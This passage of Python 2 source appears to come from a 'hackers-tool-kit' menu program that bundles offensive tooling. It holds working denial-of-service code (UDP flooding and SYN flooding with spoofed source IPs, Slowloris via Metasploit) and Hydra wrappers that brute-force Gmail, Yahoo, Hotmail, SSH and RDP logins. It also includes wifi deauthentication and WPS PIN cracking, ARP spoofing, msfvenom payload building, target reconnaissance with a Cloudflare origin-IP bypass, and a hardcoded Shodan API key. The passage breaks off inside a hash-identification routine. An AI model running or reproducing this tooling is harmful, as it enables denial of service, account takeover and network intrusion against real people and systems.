br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + print "\nExamples: py, php, exe\n" + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + 